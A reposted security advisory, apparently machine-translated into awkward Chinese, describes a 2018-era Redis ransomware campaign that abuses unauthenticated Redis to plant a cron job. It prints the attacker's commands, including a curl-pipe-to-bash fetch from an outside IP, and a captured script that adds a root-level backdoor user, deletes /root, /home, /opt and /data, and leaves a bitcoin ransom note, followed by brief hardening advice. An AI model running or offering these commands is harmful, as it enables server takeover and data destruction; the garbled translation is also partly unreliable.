优惠提示:领取本站阿里云代金券1888元礼包,再通过阿里云购物车批量采购云产品可获得更多优惠!

删库跑路加勒索,Redis勒索事件爆发

阿里云资讯 82℃ 0评论

9月10日下午,在06: 06,阿里云正式发现了首次使用Redis未授权访问漏洞加密货币的事件。阿里巴巴防御系统已在10年内开始全网拦截攻击。

与以前仅被窃电攻击的攻击不同,攻击者在攻击开始时使用勒索作为第一目的。攻击者并不害怕暴露,而且非常猖獗。直接删除数据和加密数据也意味着攻击者和防御者之间没有缓冲区。基本的进攻和防守对抗将是一场赤裸的刺刀战。

六个月前,高风险漏洞发出警告,但许多用户没有做出改变以引起注意。阿里云安全专家提醒用户参考文本末尾方法尽快完成漏洞修复或部署防御。一旦攻击成功,整个服务器程序和数据将被删除!很难恢复。

Redis应用程序简介

Redis是一个开源的,基于日志的Key-Value数据库,用ANSI C编写,支持网络,可以基于内存持久化,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。自2013年5月起,Redis的开发由Pivotal赞助。

Redis漏洞原理

作为内存数据库,redis可以通过定期配置或手动执行save命令将缓存中的值写入磁盘文件。如果redis进程具有足够的权限,则攻击者可以利用其未经授权的漏洞编写计划任务,ssh登录密钥,webshel​​ls等,以实现任意指令。

自2017年12月以来,由于漏洞已被大规模利用,DDG等多个僵尸网络已迅速利用并利用此漏洞占领目标,并且僵尸网络将相互删除以确保彼此。掌握自己的电脑电源。

攻击过程描述

●首先,攻击者通过提前扫描点找到了公共网络可以访问的机器并且没有设置密码。

●攻击者尝试连接到这些计算机并运行以下代码:

配置设置目录/var/spool/cron/

配置set dbfilename root

配置1 */10 * * * * curl -shttp://103.224.80.52/butterfly.sh | bash的

保存

根据上述说明,将下载脚本:http://103.224.80.52/butterfly.sh,并将脚本写入计划任务,该任务将由计划任务执行。

由于攻击者在分析时感知到我们的反向探测,因此脚本已脱机。但是我们的蜜罐成功地抓住了脚本,如下所示:

#!/斌/庆典

#*蝴蝶*

ExportPATH=$ PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

Userdel -r redis

Useradd -o -u 0 -g 0 redis&>/dev/null

回声“abcd-1234-!” | passwd-stdin redis&>/dev/null

Rm -rf/root/*

Rm -rf/home/*

Rm -rf/opt/*

Rm -rf/data/*

Rm -rf/data *

Mkdir -p/data

Echo -e“\ n警告!\ n您的文件和数据库已下载并备份在我们的安全服务器上。要恢复您的丢失数据:将0.6 BTC发送到我们的BitCoin地址,并通过电子邮件联系我们,您的服务器IP地址和付款证明。任何电子邮件欢迎你!\ nMail: dbsecuritys@protonmail.com \ nBitCoin: 3JPaDCoRnQatEhdY59KtgF38GZiL5Kiny \ n“> /root/Warning.txt

Chmod + x /root/Warning.txt

Cp /root/Warning.txt /Warning.txt

Cp /root/Warning.txt /data/Warning.txt

Echo -e“\ n警告!\ n您的文件和数据库已下载并备份在我们的安全服务器上。要恢复您的丢失数据:将0.6 BTC发送到我们的BitCoin地址,并通过电子邮件联系我们,您的服务器IP地址和付款证明。任何电子邮件没有您的服务器IPAddress和付款证明将被忽略。我们将在24小时后放弃备份。你是

●攻击者要求将0.6比特币发送到地址: 3JPaDCoRnQatEhdY59KtgF38GZiL5Kiny,否则数据备份将在24小时内删除。

●但是从这个脚本中很明显,攻击者根本没有执行备份,即使攻击者给了钱,它也不会返回数据。

截至9月10日晚上8点,该地址共收到0.6个比特币转账,今天全部发送,受害人已开始转账。

安全建议

●通过安全组限制对公共网络上Redis等服务的访问

●通过修改redis.conf配置文件并隐藏重要命令来添加密码验证

●以低权限运行redis服务等

转载请注明:阿里云优惠网 » 删库跑路加勒索,Redis勒索事件爆发

喜欢 (0)or分享 (0)

领取本站阿里云代金券1888元礼包后并购买阿里云产品您能得到哪些优惠?

1.使用阿里云代金券1888元礼包与阿里云官网首购3年五折优惠互不冲突

2.可获得本站专属返现20%+抽奖+专属客服【点击领取阿里云代金券1888元礼包>>

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址